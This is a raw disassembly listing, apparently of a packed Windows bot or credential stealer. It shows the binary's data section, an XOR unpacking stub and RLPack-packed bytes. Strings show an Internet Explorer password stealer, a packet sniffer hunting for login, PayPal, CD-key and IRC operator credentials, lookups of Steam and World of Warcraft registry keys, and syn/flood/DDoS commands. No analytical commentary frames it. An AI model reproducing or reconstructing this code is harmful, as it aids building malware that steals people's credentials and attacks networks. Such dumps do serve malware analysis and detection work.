dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41D42C dd 70747468h, 2F3A73hdword_41D434 dd 70747468h, 2F3Ahdword_41D43C dd 7274533Ah, 676E69h ; sub_414EF4+99A�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_414EF4+968�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_414EF4:loc_415842�o
align 4
dword_41D45C dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_414EF4+935�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_41D49C dd 2Ch ; sub_414EF4+852�o ...
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_414EF4:loc_4155CE�o
align 4
dword_41D4AC dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_414EF4+6C6�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_414EF4:loc_41550C�o
align 10h
dword_41D510 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_414EF4+604�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_414EF4+5C2�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_414EF4+41C�o
asc_41D560 db '%x',0 ; DATA XREF: sub_414EF4+234�o
align 4
unk_41D564 db 2Dh ; - ; DATA XREF: sub_414EF4+1A9�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 8
dword_41D598 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; sub_414EF4+2C7�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D5CC dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_415B60+277�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_415B60+149�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_415B60+10A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_415B60:loc_415C2F�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_415B60:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_415B60+8C�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D6FC dd offset aUser_0 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_1 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_0 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_41D758 dd offset aLogin_0 ; DATA XREF: sub_415EB7+54�o
; "login "
align 10h
dd offset aSxt ; "sxt "
align 8
dd offset aAuth ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey_0 ; "cd-key"
align 8
dd offset aCdKey ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
align 10h
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
dd 0
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D7CC dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_41D810 dd offset dword_41D86C ; DATA XREF: sub_415EB7+98�o
align 8
dd offset dword_41D864
align 10h
dd offset dword_41D85C
align 8
dd offset dword_41D854
align 10h
dd offset dword_41D84C
align 8
dd offset dword_41D844
dd 2 dup(0)
dword_41D844 dd 54495551h, 20hdword_41D84C dd 54524150h, 20hdword_41D854 dd 4E494F4Ah, 20hdword_41D85C dd 49504F54h, 2043hdword_41D864 dd 49544F4Eh, 204543hdword_41D86C dd 56495250h, 2047534Dh, 0aDdos db 'ddos',0 ; DATA XREF: .packed:0041D804�o
align 10h
aServu db 'servu',0 ; DATA XREF: .packed:0041D7FC�o
align 4
aServU db 'serv u',0 ; DATA XREF: .packed:0041D7F4�o
align 10h
aServU_0 db 'serv-u',0 ; DATA XREF: .packed:0041D7EC�o
align 4
aClone db 'clone ',0 ; DATA XREF: .packed:0041D7E4�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: .packed:0041D7DC�o
align 4
aSyn db 'syn',0 ; DATA XREF: .packed:0041D7D4�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: .packed:off_41D7CC�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: .packed:0041D7C0�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: .packed:0041D7B8�o
aLP db 'l/p',0 ; DATA XREF: .packed:0041D7B0�o
aIrcOperator db 'irc operator',0 ; DATA XREF: .packed:0041D7A8�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: .packed:0041D7A0�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: .packed:0041D798�o
align 4
aCdKey db 'cd key',0 ; DATA XREF: .packed:0041D788�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: .packed:0041D780�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: .packed:0041D778�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: .packed:0041D770�o
align 4
aAuth db 'auth ',0 ; DATA XREF: .packed:0041D768�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: .packed:0041D760�o
align 4
aLogin_0 db 'login ',0 ; DATA XREF: .packed:off_41D758�o
align 10h
aPw db 'pw=',0 ; DATA XREF: .packed:0041D74C�o
aPass_0 db 'pass=',0 ; DATA XREF: .packed:0041D744�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: .packed:0041D73C�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: .packed:0041D734�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: .packed:0041D72C�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: .packed:0041D724�o
aAuth_0 db ' :auth ',0 ; DATA XREF: .packed:0041D71C�o
aIdentify db 'identify ',0 ; DATA XREF: .packed:0041D714�o
align 4
aOper db 'oper ',0 ; DATA XREF: .packed:0041D70C�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: .packed:0041D708�o
align 4
aPass_1 db 'pass ',0 ; DATA XREF: .packed:0041D704�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: .packed:0041D700�o
align 10h
aUser_0 db 'user ',0 ; DATA XREF: .packed:off_41D6FC�o
align 4
dword_41D9A8 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_415F69+5CE�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41D9DC db 2Dh ; - ; DATA XREF: sub_415F69+1A6�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 65h ; e
db 76h, 65h, 6Ch
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aPacketSnifferR db ' packet sniffer running',0
align 10h
dword_41DA10 dd 6576654Ch, 3003206Ch, 75250234h, 70200203h, 656B6361h
; DATA XREF: sub_41665C+8E�o
dd 6E732074h, 65666669h, 72h, 41DA34h, 0DCD88992h, 0CEBA94B3h
dd 0B4ACFFE6h, 2 dup(0)
dword_41DA48 dd 0A1C21D0Eh ; sub_4167F1+54�r ...
dword_41DA4C dd 0D6AF099Eh dword_41DA50 dd 0ED38F9D8h dword_41DA54 dd 5D58CED8h dd 0
off_41DA5C dd offset dword_41DD44 ; DATA XREF: sub_40E618+1C3�r
; sub_40E618+1D5�r ...
dd 2 dup(0)
off_41DA68 dd offset dword_41CC4C ; DATA XREF: sub_40A9CF+7B3�r
; sub_40CF2F+82�r ...
off_41DA6C dd offset dword_41CC40 ; DATA XREF: sub_40CF2F+B8�r
dword_41DA70 dd 0 ; sub_40CF2F+DF�r
dd offset dword_41CC2C
dd offset dword_41CC20
align 10h
or ah, cl
inc ecx
add ah, bh
retf
; ---------------------------------------------------------------------------
dw 41h
dd 0
dd offset dword_41CBE8
dd offset dword_41CBDC
dd 4 dup(0)
dword_41DAA4 dd 8F88D9DDh, 81F1C5A2h, 2 dup(0) ; sub_40D871:loc_40DCB8�o
dword_41DAB4 dd 73616C23h, 36h, 1Eh dup(0) ; sub_4093B6+6C�o ...
byte_41DB34 db 0C1h ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 85h, 0D8h, 0DFh
dd 0F1h, 1Eh dup(0)
byte_41DBB4 db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 4
dd 1Fh dup(0)
dword_41DC34 dd 3430032Eh, 2036202h, 0 ; sub_40D871+242�o
dword_41DC40 dd 0D3D58395h, 90FCC9F1h, 0B2FCACh, 3Eh dup(0) ; sub_406AE7+2E�o
dword_41DD44 dd 0DFDFA6C8h, 0DBA0D4F2h, 0BCh, 0dword_41DD54 dd 3430032Dh, 62656402h, 2036775haEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 4
aEntry db 'entry',0 ; DATA XREF: .packed:00416AE7�o
align 4
aLoop db 'loop',0 ; DATA XREF: .packed:00416AC5�o
align 4
aPing08x db 'PING :%08X',0 ; DATA XREF: sub_4167F1+263�o
align 10h
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: sub_4167F1+5A�o
align 10h
dword_41DDD0 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh, 4172BCh, 0
; DATA XREF: sub_416E4E+15�o
a_?av_com_error db '.?AV_com_error@@',0
align 10h
dd offset dword_4172B4+8
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DE18 dd 0 ; sub_401856+21�r ...
dword_41DE1C dd 0 ; sub_401856+36�r ...
dword_41DE20 dd 0 ; sub_401856+4B�r ...
dword_41DE24 dd 0 ; sub_401856+C�r ...
dd 0
dword_41DE2C dd 0 ; sub_4018AF+62�r ...
byte_41DE30 db 0 ; DATA XREF: sub_401981+1BA�o
; sub_402A32+57�r ...
align 8
dword_41DE38 dd 0 ; sub_404CBB+1B�r ...
dword_41DE3C dd 0 dword_41DE40 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_409C36+12�r ...
align 8
dword_41DE48 dd 5B86A313h dword_41DE4C dd 5B86D617h dword_41DE50 dd 5B86FD69h dword_41DE54 dd 5B894541h dword_41DE58 dd 5B868E65h dword_41DE5C dd 5B8A3009h dword_41DE60 dd 5B867750h dword_41DE64 dd 5B897BE9h dword_41DE68 dd 5B8A5DD1h dword_41DE6C dd 0 dword_41DE70 dd 0 dword_41DE74 dd 0 dword_41DE78 dd 0 dword_41DE7C dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_408B30+118�r ...
dword_41DE80 dd 0 ; sub_414EF4+6C�r ...
dword_41DE84 dd 0 ; resolved to->WS2_32.getaddrinfo ; sub_403BD3+197�r ...
dword_41DE88 dd 0 ; resolved to->WS2_32.getnameinfo ; sub_403BD3+17F�w ...
dword_41DE8C dd 0 ; resolved to->WS2_32.freeaddrinfo ; sub_403BD3+1A9�r ...
dd 5Ch dup(0)
dword_41E000 dd 0A5h dup(0) dword_41E294 dd 0 ; sub_4042FB+20�o
dword_41E298 dd 0 ; sub_4042FB:loc_404327�r
align 10h
dword_41E2A0 dd 0 ; sub_405FA3+7A�r ...
dword_41E2A4 dd 0 ; sub_405FA3+83�r ...
dword_41E2A8 dd 0 ; sub_405FA3+8C�r ...
dword_41E2AC dd 0 ; sub_405FA3+71�r ...
dword_41E2B0 dd 7 dup(0) ; sub_406041+B�o ...
byte_41E2CC db 0 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E2D0 dd 0 ; sub_409226+77�w ...
align 8
dword_41E2D8 dd 6 dup(0) ; sub_4095A4+6�o ...
dword_41E2F0 dd 0 ; sub_4095A4+11�r ...
align 8
dword_41E2F8 dd 0 ; sub_4095A4+57�r ...
dword_41E2FC dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_409DD0+65�w ...
dword_41E300 dd 0 ; sub_409DD0+44�r ...
dword_41E304 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_409DD0+91�w ...
dword_41E308 dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_409DD0+7B�w ...
align 10h
byte_41E310 db 0 ; DATA XREF: sub_409DD0+29�r
; sub_409DD0+96�w
align 4
dd 101h dup(0)
byte_41E718 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E898 dd 40h dup(0) ; sub_40CF2F+A6�o ...
dword_41E998 dd 3 dup(0) ; sub_40CF2F+36�o ...
dword_41E9A4 dd 0 ; sub_40D366+15�r ...
dd 0
dword_41E9AC dd 0 ; sub_40E618:loc_40E66D�w
byte_41E9B0 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 40h dup(0)
byte_41EAB4 db 0 ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
align 4
dd 4 dup(0)
dword_41EAC8 dd 5 dup(0) ; sub_40ED6E+35�o ...
dword_41EADC dd 0 ; sub_410318+7�w ...
dword_41EAE0 dd 0 ; sub_410318+11�w ...
dword_41EAE4 dd 0 ; sub_410318+1B�w ...
dword_41EAE8 dd 0 ; sub_410318+25�w ...
align 10h
byte_41EAF0 db 0 ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
align 4
dd 5 dup(0)
dword_41EB08 dd 2 dup(0) dword_41EB10 dd 0 dword_41EB14 dd 2 dup(0) dword_41EB1C dd 0 ; sub_4127D0+16�w
dword_41EB20 dd 0 ; sub_4127D0:loc_4128A0�r
dword_41EB24 dd 2 dup(0) ; sub_412E04+7F�o
dword_41EB2C dd 41h dup(0) ; sub_407148+172�o ...
dword_41EC30 dd 0 ; sub_4167F1+118�w
dword_41EC34 dd 0 dword_41EC38 dd 0 dword_41EC3C dd 0 dword_41EC40 dd 42h dup(0) ; sub_40A9CF+C51�o ...
dword_41ED48 dd 40h dup(0) ; sub_40A9CF+108E�o ...
byte_41EE48 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EEC8 db 0 ; DATA XREF: sub_403DF3:loc_403F07�r
; sub_403DF3+11F�o ...
align 4
dd 1Fh dup(0)
dword_41EF48 dd 40h dup(0) ; sub_4055E5+746�o ...
byte_41F048 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 4
dd 3EDh dup(0)
db 0F3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start_0
loc_420001: ; CODE XREF: start_0-5093�j
push 0F02464FFh
push 58585858h
call esp
push eax
mov eax, [eax-0Eh]
add eax, 95F695B0h
jnz near ptr 0FFFD811Dh
push offset sub_4167F1
mov edi, offset sub_401000
mov ecx, offset dword_417000
loc_42002B: ; CODE XREF: start_0-11CEB�j
xor byte ptr [edi], 0F3h
inc edi
cmp edi, ecx
jnz short loc_42002B
mov edi, offset off_418000
mov ecx, offset dword_41E000
loc_42003D: ; CODE XREF: start_0-11CD9�j
xor byte ptr [edi], 1Eh
inc edi
cmp edi, ecx
jnz short loc_42003D
call $+5
retn
; END OF FUNCTION CHUNK FOR start_0
; ---------------------------------------------------------------------------
align 2000h
_packed ends
; Section 2. (virtual address 00022000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00022000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_RLPack segment para public 'CODE' use32
assume cs:_RLPack
;org 422000h
assume es:nothing, ss:nothing, ds:_packed, fs:nothing, gs:nothing
dd 0FF1D5300h, 620221E7h, 0CCB7B6C6h, 90B61539h, 2A063A90h
dd 0D39655B8h, 0BA183E8Ah, 68659F3Eh, 0CADEB3FAh, 3C55B176h
dd 29BEFE15h, 9B9CDF5h, 0B32FF720h, 8D7F9F99h, 9E545AE1h
dd 2816AF80h, 0F16A3B95h, 45D3568h, 8B85197Eh, 775AB377h
dd 1DA162BCh, 0CBD760EEh, 0DB767A7Ah, 23ED6318h, 6EAF7C87h
dd 0E59C6D11h, 1A352CA5h, 7CD54DE6h, 0AAF1BA36h, 0CE5E10h
dd 0B730C7Ah, 0D0C8CD78h, 712C7052h, 0D61CFCA6h, 0D9BA978Bh
dd 486CACC9h, 994393F7h, 16647342h, 50BD7DD1h, 0FB4E3820h
dd 29F463FDh, 0D759AE47h, 0C6512788h, 60FBF618h, 1EF26D07h
dd 7A9A058Dh, 0CBA9310Dh, 81241B2Dh, 0E1317CB4h, 72BA6883h
dd 89D58FC9h, 3AEA84CEh, 0F2C9984Eh, 8B9091C5h, 97BAE7Eh
dd 1233CF6Fh, 53D7472Ah, 800555B8h, 0F510B490h, 0E460514Fh
dd 0A9220846h, 5724FD5Bh, 37304001h, 998E3615h, 0AC556414h
dd 83320789h, 11636770h, 242BB131h, 0E3642E33h, 75AEB604h
dd 0EF42548Dh, 0CAA8E596h, 6B3E926Fh, 0EDF99CADh, 21BF7739h
dd 0BE06A1D0h, 0A3276646h, 0C9D0F122h, 0A07CB6FFh, 0F2D9EA36h
dd 0BCF6AF8Ch, 0C045C4A8h, 0ABFC3796h, 0D16C8F12h, 15AB8916h
dd 73DC3BF9h, 77C07618h, 0C2F1C6B0h, 0AD539A78h, 0D286B584h
dd 44271EDAh, 0FC05B615h, 626E3E3Ah, 916C1A2Bh, 0FAE53F36h
dd 73FA534h, 0E59A7062h, 5C19364Bh, 5ABB5E6h, 0C1D194D4h
dd 988ED131h, 55EFFD7Ah, 179386F7h, 6C80F65Bh, 953D3ACFh
dd 81568B5Ah, 0F1A73FC8h, 48F5B360h, 0C55FA1C2h, 85A9785Fh
dd 0A16651C7h, 2706F46Eh, 79A8565Ch, 7F50C6BBh, 0B85D0368h
dd 0A91943DCh, 0F3E68652h, 2750FAE1h, 0A81554DEh, 7D3ECCECh
dd 57A5A76Eh, 51DA4734h, 50FEC45Ch, 9A2836C1h, 53639F78h
dd 0E46ED581h, 0F2979884h, 6ED39C6Dh, 0BCD069E1h, 9664B874h
dd 353CB1C9h, 51A63F65h, 16935EDCh, 8ABD4946h, 9F949BA4h
dd 0A82BF4Dh, 4C496713h, 88A50B6Dh, 52786059h, 33DEAD0Dh
dd 7FFD4559h, 0F045433Ch, 32C1F614h, 0E0FB64Ah, 0E6867662h
dd 85F9729Fh, 0A9643342h, 1180E46h, 58DB77C6h, 591A403Bh
dd 82902AAFh, 0E97DEA92h, 1213480Fh, 9393A94Bh, 7C7950ECh
dd 0E37AFDB5h, 2C209D1Bh, 353E2C8Ah, 2D06E3D8h, 0FCEB0510h
dd 82584CA7h, 84CEE29h, 21E1E3E4h, 0A51A5FB3h, 0DC258E0Fh
dd 0D46B14B1h, 1861DE36h, 0E398F09Fh, 175E7252h, 67BF9917h
dd 973CF71Fh, 7D6E5CA3h, 270EE2ECh, 4B3064EBh, 4D1FD615h
dd 5073BC05h, 5FCCFCE9h, 847EEE2Ah, 0E00F7595h, 5FDC494Ch
dd 0F4407BF4h, 9361AD9Eh, 9A3AFB2Eh, 958A0F73h, 0F95E7430h
dd 33AEAF7h, 0B71BFA4Ah, 9B92A6EDh, 685AA07Fh, 3B3AEEEAh
dd 0C1DF18ACh, 19083C5h, 0E5F52F86h, 0F50CCE38h, 0FC93C2EBh
dd 0F628795Ch, 0A204C878h, 2E9D2CF0h, 2D9B0407h, 7866E266h
dd 1F5F2126h, 0FB13C63Fh, 4F13E1B5h, 4D1FC54Ah, 0B66637CAh
dd 6E0A3FB3h, 0FE3DA894h, 0FC9E29F7h, 29C792A7h, 3687DEFCh
dd 95672DB6h, 6F49B6C4h, 3262DA6Bh, 0CA113DADh, 0F628B3AAh
dd 0C8F587C1h, 0FA1095C8h, 610426C9h, 925EDDFFh, 79A12E03h
dd 0C437E44Ch, 26791A54h, 7F42B282h, 0AC344895h, 0C940B346h
dd 239B9CD1h, 0F6A38CAAh, 2A48E889h, 84BC0951h, 65FA31EFh
dd 256D69DEh, 1BF099CAh, 1B17508Ch, 38DFE8D9h, 0E94DEFC1h
dd 0B9C71F8Ch, 8FE6B5Ch, 353BF598h, 9F0464Ah, 3845B33Eh
dd 0E8A4FCCFh, 7A829C8Eh, 49C2F428h, 8AD305A1h, 0A62CC7F0h
dd 870364D2h, 7D336EAEh, 0EE18E8AEh, 45DD4642h, 0A97B204Fh
dd 7AD72CFh, 0D9C52B6Ch, 0A0F46917h, 66A8A5EEh, 401D188Fh
dd 92AD8560h, 4A0CBA05h, 0F49D8E5Eh, 7752638Ah, 0FDA3816Ch
dd 2D1FFC3Fh, 3F8D713Ah, 0EB312ADCh, 0D0F27BF0h, 0DEDDC5C2h
dd 40EADC3Ah, 0B2257671h, 0C22C99EEh, 0E1E1565Ch, 1614B989h
dd 9484FDB6h, 0DF489550h, 5C84B310h, 0FABA18F7h, 6AE37595h
dd 0F3C63EE1h, 0F678B5A8h, 186F9FCCh, 9EAA6113h, 32458A3Dh
dd 3CE26D4Ah, 82470573h, 853B0822h, 0F3EC207Ah, 0B3D813C7h
dd 15E4BCD8h, 7877A4C1h, 0E9B46C00h, 0DCC59908h, 0DD46FB87h
dd 0BD3BE819h, 0C58F13D0h, 0B7B0275Fh, 0C3298850h, 0BB031097h
dd 83348C00h, 3F87C6BFh, 0E1C95D6Ah, 704AD215h, 8EACFDD5h
dd 879C5BF9h, 0DCAAFD90h, 71CE985Ah, 509028F6h, 0D85CAB48h
dd 6964952Ah, 82BE0780h, 98335329h, 8C23AA31h, 89384DF0h
dd 0BE565CAh, 2026E4D7h, 6FC03130h, 63320211h, 12731666h
dd 0EAA76B9Fh, 0B91F1891h, 0E5FB750Bh, 0B1410838h, 5E810163h
dd 65C8F699h, 28E460D3h, 0ABA45DF0h, 118C8926h, 8C4C40D0h
dd 0F2F98255h, 83AA1ADh, 0E6774074h, 57DA4B26h, 0C8594887h
dd 0C15ABCBEh, 6CE6D008h, 0D6CF1366h, 0A450BB80h, 0A20C6E92h
dd 587F3C4Dh, 5E2BC223h, 2736E022h, 1BEF2C9Fh, 0EFBB8E85h
dd 3FD22F1Fh, 2D414F72h, 28787C87h, 17158453h, 5DF5E53Ch
dd 610EB1BCh, 0C6B93385h, 4086E7A5h, 0DB5BB94Fh, 0A6872857h
dd 0FEADE433h, 0EB2894Ch, 583E71F0h, 0BB1D7228h, 0A4443C19h
dd 75442DF6h, 0DB43FFB4h, 0BA2F6B36h, 0F28CE86Ch, 416815AEh
dd 0F121A3FAh, 29ED6C99h, 9388300Bh, 782BA6CFh, 86F5E4A0h
dd 7FC50FE3h, 0FE847255h, 75841322h, 12C1BABAh, 3962104Bh
dd 0CDEEF7F1h, 672346EAh, 0F27675C1h, 400059FDh, 4000A067h
dd 72B75C01h, 453B52C3h, 5E22C4EEh, 0CA2F0900h, 0B7C01953h
dd 3B883F57h, 6973A615h, 0D5580D4Fh, 8F0B5730h, 0B26D70A7h
dd 0F88B8B86h, 409B4351h, 403AC5AEh, 0C5ADFF61h, 88BF4027h
dd 5890E386h, 94AB89E3h, 8DA331E1h, 0DCB444D9h, 7DAE698Bh
dd 948B284Dh, 0F0C0C47Ch, 0AFA53F4Ah, 7EB2D8h, 5189555Fh
dd 61A19DFBh, 0F83DA2ECh, 3D054A2Dh, 0EADD0891h, 3C6314Eh
dd 718E02C9h, 0FDE72D1Ah, 554EA72Eh, 65BD413Eh, 0AACED6D0h
dd 9EA5FEE2h, 5D247CEDh, 9E20B204h, 607EE21Fh, 5C3E20ABh
dd 0BFC220F2h, 0F6971D07h, 8F3181F5h, 98D25552h, 7CEEFAD1h
dd 0D5E314C3h, 0D38E71B8h, 396EA168h, 0FFC1EF25h, 707E2464h
dd 70729192h, 92285069h, 4E61F34Fh, 420F41A2h, 0D8FB62CCh
dd 77790790h, 0B359C645h, 8BF8AE7Dh, 41F5149Fh, 12416778h
dd 0C407A63h, 1D36B941h, 0CE39B990h, 0E937A790h, 75292B8Bh
dd 59351C04h, 179121E9h, 46A9D6DEh, 770CF508h, 165591C2h
dd 0AA7E0C6h, 613CF37Fh, 0B9EFC9DDh, 20129F90h, 388B9D25h
dd 0A9B90C37h, 5691231Dh, 900E06FAh, 0CE2309D8h, 7649AA49h
dd 0D097BF4Dh, 6E1D7111h, 2600B49Bh, 0C05A36FDh, 6AC24BEDh
dd 96E0B7A8h, 0A1C68937h, 572D12FEh, 0B6F7AAC8h, 0DE6BF394h
dd 0DD3DFF21h, 109C7A8h, 0AF31A43Ch, 8353F38Bh, 0CA065AADh
dd 0DF838D9Ch, 95856AA7h, 541F809h, 0A5BB2827h, 0EAF82ABFh
dd 0F5A814BAh, 0BCC01C0Bh, 0F741A4F9h, 8AD6429Ah, 0E0B69F72h
dd 3F0D87E2h, 65766B33h, 6BDB0A6Ah, 534CCF4Bh, 0DEA58410h
dd 2DC93812h, 0E636C3A0h, 2AEE451Eh, 3AC4188Fh, 1CD39B28h
dd 0BDCA65DDh, 3D1F1BA8h, 61EB750Ah, 7C223850h, 0A0FB7A15h
dd 4B786ABAh, 654F1157h, 923F00E8h, 6EA09C01h, 3CBD55E9h
dd 6984A2A5h, 0C2074858h, 3537A3B3h, 0D26B79CAh, 76D5AE2h
dd 626532F4h, 46791481h, 7FA6C087h, 0A13B93A0h, 0FC761738h
dd 0A02BE6D6h, 0A1502C37h
dd 0AA54F8F7h, 172C9214h, 0D149A9E8h, 2D7D1670h, 2EF2310Bh
dd 9035D4F3h, 0DEF3022Eh, 1258294Ch, 4D1B95C3h, 9A936647h
dd 0FC7809CCh, 26424303h, 473DA95Dh, 52413693h, 0CBD23426h
dd 88F9B46Fh, 9550C9EDh, 8FB5A7B4h, 0B362EB01h, 8022F9C5h
dd 8822E98Dh, 3744F8A0h, 1DE3B175h, 0D33BD1E2h, 0D9EFCAB4h
dd 0F63983D0h, 0E214F54Eh, 544B6202h, 0B4C75B04h, 2DDC0AB9h
dd 0E9522559h, 5A99057Fh, 1C630BD2h, 2FD07CA0h, 7DA3D979h
dd 36E91103h, 1C373603h, 18B7425Dh, 0BBEE94F4h, 0C720803h
dd 378408A6h, 848B6A21h, 4F96DFA0h, 70A3147Dh, 7FFD4B45h
dd 79DD2D94h, 0FB28275h, 0D30770FBh, 3661D238h, 4F3A27AEh
dd 0F3C1BA37h, 78879890h, 0B01B8EA1h, 0D57E23DFh, 0EE2A5778h
dd 0E5FD90Ah, 7429EE90h, 0FE3B47DBh, 46A52B6Eh, 37E08588h
dd 1F625F2h, 4F2B17BBh, 306976BCh, 8B02CD55h, 0CC8256D3h
dd 0B41E3E3Eh, 0EF5EE8CBh, 0C4BA5A2Ch, 0A8CBE2F1h, 51A40E1Ah
dd 4FB5E3C1h, 0EA56A313h, 28958DBBh, 0FE4264BEh, 124DC1A6h
dd 5B5F3204h, 5F44B689h, 0E56AD3F7h, 9ABE411Eh, 36E44330h
dd 7ECBCF65h, 0E401ADA3h, 1703568Eh, 63F013C3h, 0A76ED4D6h
dd 743DA676h, 73199F62h, 77ED2BD9h, 3A9980CAh, 0F0A54250h
dd 247B55C1h, 1FA48546h, 0A80CA4BEh, 892F7A6Ch, 0C43ED87Ch
dd 0E2DF5FD5h, 392C048Bh, 0D750D4BCh, 2525382Eh, 2377EC33h
dd 655E4E0Bh, 0F612A853h, 0FD63213Ch, 22FA25ADh, 0EB5C996Ch
dd 0E001459h, 9950F4C0h, 911FDFD6h, 9FB542E1h, 0D49F8855h
